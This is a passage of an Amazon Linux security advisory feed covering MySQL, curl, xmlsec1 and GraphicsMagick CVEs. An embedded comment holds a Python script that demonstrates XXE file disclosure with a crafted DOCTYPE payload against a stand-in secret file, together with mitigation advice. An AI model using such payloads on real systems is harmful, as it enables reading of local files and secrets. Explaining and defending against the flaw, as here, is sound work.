Vulnerability in the MySQL Connectors component of Oracle MySQL (subcomponent: Connector/C). Supported versions that are affected are 6.1.10 and earlier. Difficult to exploit vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Connectors. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Connectors. Note: The documentation has also been updated for the correct way to use mysql_stmt_close(). Please see: https://dev.mysql.com/doc/refman/5.7/en/mysql-stmt-execute.html, https://dev.mysql.com/doc/refman/5.7/en/mysql-stmt-fetch.html, https://dev.mysql.com/doc/refman/5.7/en/mysql-stmt-close.html, https://dev.mysql.com/doc/refman/5.7/en/mysql-stmt-error.html, https://dev.mysql.com/doc/refman/5.7/en/mysql-stmt-errno.html, and https://dev.mysql.com/doc/refman/5.7/en/mysql-stmt-sqlstate.html. CVSS 3.0 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H).
1472685:
CVE-2017-3635 mysql: C API unspecified vulnerability (CPU Jul 2017)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3635" title="" id="CVE-2017-3635" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3636" title="" id="CVE-2017-3636" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3641" title="" id="CVE-2017-3641" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3648" title="" id="CVE-2017-3648" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3651" title="" id="CVE-2017-3651" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3652" title="" id="CVE-2017-3652" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3653" title="" id="CVE-2017-3653" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mysql55-debuginfo" version="5.5.57" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-debuginfo-5.5.57-1.18.amzn1.x86_64.rpm</filename></package><package name="mysql55-libs" version="5.5.57" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-libs-5.5.57-1.18.amzn1.x86_64.rpm</filename></package><package name="mysql55-test" version="5.5.57" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-test-5.5.57-1.18.amzn1.x86_64.rpm</filename></package><package name="mysql55" version="5.5.57" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-5.5.57-1.18.amzn1.x86_64.rpm</filename></package><package name="mysql55-embedded-devel" version="5.5.57" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-embedded-devel-5.5.57-1.18.amzn1.x86_64.rpm</filename></package><package name="mysql-config" version="5.5.57" release="1.18.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/mysql-config-5.5.57-1.18.amzn1.x86_64.rpm</filename></package><package name="mysql55-embedded" version="5.5.57" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-embedded-5.5.57-1.18.amzn1.x86_64.rpm</filename></package><package name="mysql55-bench" version="5.5.57" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-bench-5.5.57-1.18.amzn1.x86_64.rpm</filename></package><package name="mysql55-server" version="5.5.57" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-server-5.5.57-1.18.amzn1.x86_64.rpm</filename></package><package name="mysql55-devel" version="5.5.57" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-devel-5.5.57-1.18.amzn1.x86_64.rpm</filename></package><package name="mysql55-bench" version="5.5.57" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-bench-5.5.57-1.18.amzn1.i686.rpm</filename></package><package name="mysql55-test" version="5.5.57" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-test-5.5.57-1.18.amzn1.i686.rpm</filename></package><package name="mysql55-embedded-devel" version="5.5.57" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-embedded-devel-5.5.57-1.18.amzn1.i686.rpm</filename></package><package name="mysql55-devel" version="5.5.57" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-devel-5.5.57-1.18.amzn1.i686.rpm</filename></package><package name="mysql55-server" version="5.5.57" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-server-5.5.57-1.18.amzn1.i686.rpm</filename></package><package name="mysql55-debuginfo" version="5.5.57" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-debuginfo-5.5.57-1.18.amzn1.i686.rpm</filename></package><package name="mysql55-libs" version="5.5.57" release="1.18.amzn1" epoch="0" 
arch="i686"><filename>Packages/mysql55-libs-5.5.57-1.18.amzn1.i686.rpm</filename></package><package name="mysql55-embedded" version="5.5.57" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-embedded-5.5.57-1.18.amzn1.i686.rpm</filename></package><package name="mysql55" version="5.5.57" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-5.5.57-1.18.amzn1.i686.rpm</filename></package><package name="mysql-config" version="5.5.57" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/mysql-config-5.5.57-1.18.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-888</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-888: medium priority package update for mysql56</title><issued date="2017-08-31 17:11:00" /><updated date="2017-08-31 23:33:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-3653:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: DDL). Supported versions that are affected are 5.5.56 and earlier, 5.6.36 and earlier and 5.7.18 and earlier. Difficult to exploit vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of MySQL Server accessible data. CVSS 3.0 Base Score 3.1 (Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:N).
1472711:
CVE-2017-3653 mysql: Server: DDL unspecified vulnerability (CPU Jul 2017)
CVE-2017-3652:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: DDL). Supported versions that are affected are 5.5.56 and earlier, 5.6.36 and earlier and 5.7.18 and earlier. Difficult to exploit vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of MySQL Server accessible data as well as unauthorized read access to a subset of MySQL Server accessible data. CVSS 3.0 Base Score 4.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N).
1472710:
CVE-2017-3652 mysql: Server: DDL unspecified vulnerability (CPU Jul 2017)
CVE-2017-3651:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Client mysqldump). Supported versions that are affected are 5.5.56 and earlier, 5.6.36 and earlier and 5.7.18 and earlier. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of MySQL Server accessible data. CVSS 3.0 Base Score 4.3 (Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N).
1472708:
CVE-2017-3651 mysql: Client mysqldump unspecified vulnerability (CPU Jul 2017)
CVE-2017-3649:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Replication). Supported versions that are affected are 5.6.36 and earlier and 5.7.18 and earlier. Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.4 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H).
1472705:
CVE-2017-3649 mysql: Server: Replication unspecified vulnerability (CPU Jul 2017)
CVE-2017-3648:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Charsets). Supported versions that are affected are 5.5.56 and earlier, 5.6.36 and earlier and 5.7.18 and earlier. Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.4 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H).
1472704:
CVE-2017-3648 mysql: Server: Charsets unspecified vulnerability (CPU Jul 2017)
CVE-2017-3647:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Replication). Supported versions that are affected are 5.6.36 and earlier and 5.7.18 and earlier. Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.4 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H).
1472703:
CVE-2017-3647 mysql: Server: Replication unspecified vulnerability (CPU Jul 2017)
CVE-2017-3641:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: DML). Supported versions that are affected are 5.5.56 and earlier, 5.6.36 and earlier and 5.7.18 and earlier. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1472693:
CVE-2017-3641 mysql: Server: DML unspecified vulnerability (CPU Jul 2017)
CVE-2017-3635:
Vulnerability in the MySQL Connectors component of Oracle MySQL (subcomponent: Connector/C). Supported versions that are affected are 6.1.10 and earlier. Difficult to exploit vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Connectors. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Connectors. Note: The documentation has also been updated for the correct way to use mysql_stmt_close(). Please see: https://dev.mysql.com/doc/refman/5.7/en/mysql-stmt-execute.html, https://dev.mysql.com/doc/refman/5.7/en/mysql-stmt-fetch.html, https://dev.mysql.com/doc/refman/5.7/en/mysql-stmt-close.html, https://dev.mysql.com/doc/refman/5.7/en/mysql-stmt-error.html, https://dev.mysql.com/doc/refman/5.7/en/mysql-stmt-errno.html, and https://dev.mysql.com/doc/refman/5.7/en/mysql-stmt-sqlstate.html. CVSS 3.0 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H).
1472685:
CVE-2017-3635 mysql: C API unspecified vulnerability (CPU Jul 2017)
CVE-2017-3634:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: DML). Supported versions that are affected are 5.6.36 and earlier and 5.7.18 and earlier. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
1472684:
CVE-2017-3634 mysql: Server: DML unspecified vulnerability (CPU Jul 2017)
CVE-2017-3633:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Memcached). Supported versions that are affected are 5.6.36 and earlier and 5.7.18 and earlier. Difficult to exploit vulnerability allows unauthenticated attacker with network access via Memcached to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server as well as unauthorized update, insert or delete access to some of MySQL Server accessible data. CVSS 3.0 Base Score 6.5 (Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:H).
1472683:
CVE-2017-3633 mysql: Server: Memcached unspecified vulnerability (CPU Jul 2017)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3633" title="" id="CVE-2017-3633" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3634" title="" id="CVE-2017-3634" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3635" title="" id="CVE-2017-3635" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3641" title="" id="CVE-2017-3641" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3647" title="" id="CVE-2017-3647" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3648" title="" id="CVE-2017-3648" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3649" title="" id="CVE-2017-3649" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3651" title="" id="CVE-2017-3651" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3652" title="" id="CVE-2017-3652" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3653" title="" id="CVE-2017-3653" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mysql56-embedded-devel" version="5.6.37" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-embedded-devel-5.6.37-1.26.amzn1.x86_64.rpm</filename></package><package name="mysql56-common" version="5.6.37" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-common-5.6.37-1.26.amzn1.x86_64.rpm</filename></package><package name="mysql56-embedded" version="5.6.37" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-embedded-5.6.37-1.26.amzn1.x86_64.rpm</filename></package><package name="mysql56-devel" version="5.6.37" release="1.26.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/mysql56-devel-5.6.37-1.26.amzn1.x86_64.rpm</filename></package><package name="mysql56" version="5.6.37" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-5.6.37-1.26.amzn1.x86_64.rpm</filename></package><package name="mysql56-test" version="5.6.37" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-test-5.6.37-1.26.amzn1.x86_64.rpm</filename></package><package name="mysql56-libs" version="5.6.37" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-libs-5.6.37-1.26.amzn1.x86_64.rpm</filename></package><package name="mysql56-bench" version="5.6.37" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-bench-5.6.37-1.26.amzn1.x86_64.rpm</filename></package><package name="mysql56-debuginfo" version="5.6.37" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-debuginfo-5.6.37-1.26.amzn1.x86_64.rpm</filename></package><package name="mysql56-server" version="5.6.37" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-server-5.6.37-1.26.amzn1.x86_64.rpm</filename></package><package name="mysql56-errmsg" version="5.6.37" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-errmsg-5.6.37-1.26.amzn1.x86_64.rpm</filename></package><package name="mysql56-common" version="5.6.37" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-common-5.6.37-1.26.amzn1.i686.rpm</filename></package><package name="mysql56-errmsg" version="5.6.37" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-errmsg-5.6.37-1.26.amzn1.i686.rpm</filename></package><package name="mysql56-test" version="5.6.37" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-test-5.6.37-1.26.amzn1.i686.rpm</filename></package><package name="mysql56-debuginfo" version="5.6.37" release="1.26.amzn1" epoch="0" 
arch="i686"><filename>Packages/mysql56-debuginfo-5.6.37-1.26.amzn1.i686.rpm</filename></package><package name="mysql56" version="5.6.37" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-5.6.37-1.26.amzn1.i686.rpm</filename></package><package name="mysql56-libs" version="5.6.37" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-libs-5.6.37-1.26.amzn1.i686.rpm</filename></package><package name="mysql56-server" version="5.6.37" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-server-5.6.37-1.26.amzn1.i686.rpm</filename></package><package name="mysql56-bench" version="5.6.37" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-bench-5.6.37-1.26.amzn1.i686.rpm</filename></package><package name="mysql56-embedded-devel" version="5.6.37" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-embedded-devel-5.6.37-1.26.amzn1.i686.rpm</filename></package><package name="mysql56-devel" version="5.6.37" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-devel-5.6.37-1.26.amzn1.i686.rpm</filename></package><package name="mysql56-embedded" version="5.6.37" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-embedded-5.6.37-1.26.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-889</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-889: medium priority package update for curl</title><issued date="2017-08-31 17:19:00" /><updated date="2017-08-31 23:34:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-1000101:
Details pending
1478309:
CVE-2017-1000101 curl: URL globbing out of bounds read
CVE-2017-1000100:
Details pending
1478310:
CVE-2017-1000100 curl: TFTP sends more than buffer size
CVE-2017-1000099:
Details pending
1478316:
CVE-2017-1000099 curl: FILE buffer read out of bounds
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000099" title="" id="CVE-2017-1000099" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000100" title="" id="CVE-2017-1000100" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000101" title="" id="CVE-2017-1000101" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libcurl-devel" version="7.51.0" release="9.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcurl-devel-7.51.0-9.75.amzn1.x86_64.rpm</filename></package><package name="curl" version="7.51.0" release="9.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/curl-7.51.0-9.75.amzn1.x86_64.rpm</filename></package><package name="curl-debuginfo" version="7.51.0" release="9.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/curl-debuginfo-7.51.0-9.75.amzn1.x86_64.rpm</filename></package><package name="libcurl" version="7.51.0" release="9.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcurl-7.51.0-9.75.amzn1.x86_64.rpm</filename></package><package name="curl" version="7.51.0" release="9.75.amzn1" epoch="0" arch="i686"><filename>Packages/curl-7.51.0-9.75.amzn1.i686.rpm</filename></package><package name="curl-debuginfo" version="7.51.0" release="9.75.amzn1" epoch="0" arch="i686"><filename>Packages/curl-debuginfo-7.51.0-9.75.amzn1.i686.rpm</filename></package><package name="libcurl-devel" version="7.51.0" release="9.75.amzn1" epoch="0" arch="i686"><filename>Packages/libcurl-devel-7.51.0-9.75.amzn1.i686.rpm</filename></package><package name="libcurl" version="7.51.0" release="9.75.amzn1" epoch="0" arch="i686"><filename>Packages/libcurl-7.51.0-9.75.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-890</id><title>Amazon 
Linux AMI 2014.03 - ALAS-2017-890: medium priority package update for xmlsec1</title><issued date="2017-09-13 22:22:00" /><updated date="2017-09-14 22:19:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-1000061:
It was discovered that xmlsec1&#039;s use of libxml2 inadvertently enabled external entity expansion (XXE) along with validation. An attacker could craft an XML file that would cause xmlsec1 to try to read local files or HTTP/FTP URLs, leading to information disclosure or denial of service.
1437311:
CVE-2017-1000061 xmlsec1: xmlsec vulnerable to external entity expansion
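<!--
As an added example, not code from xmlsec1 or libxml2, the Python script below reproduces the bug class described above with the standard library's expat-based SAX parser: the same attacker-controlled document is parsed once with external general entities enabled (the state xmlsec1 was inadvertently in) and once with them disabled. The target file and its contents are constructed stand-ins for the local files the advisory mentions; with expansion on, the entity reference is replaced by the file's contents, which a signature-verifying tool would then process, log or echo back.

```python
"""External entity expansion (XXE) demonstrated with Python's stdlib expat-based SAX parser."""
import io
import os
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges


class _TextCollector(ContentHandler):
    """Collects character data, including anything an expanded entity contributes."""

    def __init__(self):
        super().__init__()
        self.parts = []

    def characters(self, content):
        self.parts.append(content)


def parse_untrusted(xml_bytes, allow_external_entities):
    """Parse XML and return its text content.

    allow_external_entities=True reproduces the xmlsec1 bug class: the parser
    fetches SYSTEM entities, so a DTD in the attacker's document turns into a
    local file read (or an HTTP/FTP fetch). False is the safe setting.
    """
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, allow_external_entities)
    handler = _TextCollector()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(xml_bytes))
    return "".join(handler.parts).strip()


def xxe_payload(target_path):
    """Constructed attacker document: a DOCTYPE whose general entity points at a local file."""
    return (
        '<?xml version="1.0"?>\n'
        '<!DOCTYPE signed [ <!ENTITY leak SYSTEM "%s"> ]>\n'
        '<signed><data>&leak;</data></signed>\n' % target_path
    ).encode()


def demo():
    """Returns (text seen with entity expansion on, text seen with it off)."""
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as fh:
        fh.write("s3cr3t-token\n")   # constructed stand-in for /etc/passwd or a key file
        secret_path = fh.name
    try:
        doc = xxe_payload(secret_path)
        return parse_untrusted(doc, True), parse_untrusted(doc, False)
    finally:
        os.unlink(secret_path)


if __name__ == "__main__":
    leaked, blocked = demo()
    print("expansion on :", repr(leaked))
    print("expansion off:", repr(blocked))
```

The HTTP/FTP case in the advisory is the same path with a URL as the SYSTEM identifier (Python's SAX resolver hands it to urllib), which is why a parser fed untrusted input should keep feature_external_ges off and should not load external DTD subsets either. In libxml2-based code such as xmlsec1 the corresponding controls are the XML_PARSE_NOENT and XML_PARSE_DTDLOAD parser options, which should stay off, and xmlSetExternalEntityLoader(), which can be pointed at a loader that refuses everything.
-->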
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000061" title="" id="CVE-2017-1000061" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="xmlsec1-openssl" version="1.2.20" release="7.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/xmlsec1-openssl-1.2.20-7.4.amzn1.x86_64.rpm</filename></package><package name="xmlsec1" version="1.2.20" release="7.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/xmlsec1-1.2.20-7.4.amzn1.x86_64.rpm</filename></package><package name="xmlsec1-openssl-devel" version="1.2.20" release="7.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/xmlsec1-openssl-devel-1.2.20-7.4.amzn1.x86_64.rpm</filename></package><package name="xmlsec1-nss" version="1.2.20" release="7.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/xmlsec1-nss-1.2.20-7.4.amzn1.x86_64.rpm</filename></package><package name="xmlsec1-gcrypt-devel" version="1.2.20" release="7.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/xmlsec1-gcrypt-devel-1.2.20-7.4.amzn1.x86_64.rpm</filename></package><package name="xmlsec1-devel" version="1.2.20" release="7.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/xmlsec1-devel-1.2.20-7.4.amzn1.x86_64.rpm</filename></package><package name="xmlsec1-gnutls" version="1.2.20" release="7.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/xmlsec1-gnutls-1.2.20-7.4.amzn1.x86_64.rpm</filename></package><package name="xmlsec1-nss-devel" version="1.2.20" release="7.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/xmlsec1-nss-devel-1.2.20-7.4.amzn1.x86_64.rpm</filename></package><package name="xmlsec1-debuginfo" version="1.2.20" release="7.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/xmlsec1-debuginfo-1.2.20-7.4.amzn1.x86_64.rpm</filename></package><package name="xmlsec1-gnutls-devel" version="1.2.20" release="7.4.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/xmlsec1-gnutls-devel-1.2.20-7.4.amzn1.x86_64.rpm</filename></package><package name="xmlsec1-gcrypt" version="1.2.20" release="7.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/xmlsec1-gcrypt-1.2.20-7.4.amzn1.x86_64.rpm</filename></package><package name="xmlsec1-openssl" version="1.2.20" release="7.4.amzn1" epoch="0" arch="i686"><filename>Packages/xmlsec1-openssl-1.2.20-7.4.amzn1.i686.rpm</filename></package><package name="xmlsec1-gnutls" version="1.2.20" release="7.4.amzn1" epoch="0" arch="i686"><filename>Packages/xmlsec1-gnutls-1.2.20-7.4.amzn1.i686.rpm</filename></package><package name="xmlsec1-debuginfo" version="1.2.20" release="7.4.amzn1" epoch="0" arch="i686"><filename>Packages/xmlsec1-debuginfo-1.2.20-7.4.amzn1.i686.rpm</filename></package><package name="xmlsec1-nss" version="1.2.20" release="7.4.amzn1" epoch="0" arch="i686"><filename>Packages/xmlsec1-nss-1.2.20-7.4.amzn1.i686.rpm</filename></package><package name="xmlsec1" version="1.2.20" release="7.4.amzn1" epoch="0" arch="i686"><filename>Packages/xmlsec1-1.2.20-7.4.amzn1.i686.rpm</filename></package><package name="xmlsec1-gcrypt" version="1.2.20" release="7.4.amzn1" epoch="0" arch="i686"><filename>Packages/xmlsec1-gcrypt-1.2.20-7.4.amzn1.i686.rpm</filename></package><package name="xmlsec1-openssl-devel" version="1.2.20" release="7.4.amzn1" epoch="0" arch="i686"><filename>Packages/xmlsec1-openssl-devel-1.2.20-7.4.amzn1.i686.rpm</filename></package><package name="xmlsec1-gcrypt-devel" version="1.2.20" release="7.4.amzn1" epoch="0" arch="i686"><filename>Packages/xmlsec1-gcrypt-devel-1.2.20-7.4.amzn1.i686.rpm</filename></package><package name="xmlsec1-devel" version="1.2.20" release="7.4.amzn1" epoch="0" arch="i686"><filename>Packages/xmlsec1-devel-1.2.20-7.4.amzn1.i686.rpm</filename></package><package name="xmlsec1-nss-devel" version="1.2.20" release="7.4.amzn1" epoch="0" 
arch="i686"><filename>Packages/xmlsec1-nss-devel-1.2.20-7.4.amzn1.i686.rpm</filename></package><package name="xmlsec1-gnutls-devel" version="1.2.20" release="7.4.amzn1" epoch="0" arch="i686"><filename>Packages/xmlsec1-gnutls-devel-1.2.20-7.4.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-891</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-891: medium priority package update for GraphicsMagick</title><issued date="2017-09-13 22:44:00" /><updated date="2017-09-14 22:19:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-11403:
The ReadMNGImage function in coders/png.c in GraphicsMagick 1.3.26 has an out-of-order CloseBlob call, resulting in a use-after-free via a crafted file.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11403" title="" id="CVE-2017-11403" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="GraphicsMagick-doc" version="1.3.26" release="3.11.amzn1" epoch="0" arch="noarch"><filename>Packages/GraphicsMagick-doc-1.3.26-3.11.amzn1.noarch.rpm</filename></package><package name="GraphicsMagick-c++" version="1.3.26" release="3.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/GraphicsMagick-c++-1.3.26-3.11.amzn1.x86_64.rpm</filename></package><package name="GraphicsMagick-devel" version="1.3.26" release="3.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/GraphicsMagick-devel-1.3.26-3.11.amzn1.x86_64.rpm</filename></package><package name="GraphicsMagick-debuginfo" version="1.3.26" release="3.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/GraphicsMagick-debuginfo-1.3.26-3.11.amzn1.x86_64.rpm</filename></package><package name="GraphicsMagick-perl" version="1.3.26" release="3.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/GraphicsMagick-perl-1.3.26-3.11.amzn1.x86_64.rpm</filename></package><package name="GraphicsMagick-c++-devel" version="1.3.26" release="3.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/GraphicsMagick-c++-devel-1.3.26-3.11.amzn1.x86_64.rpm</filename></package><package name="GraphicsMagick" version="1.3.26" release="3.11.amzn1" epoch="0" 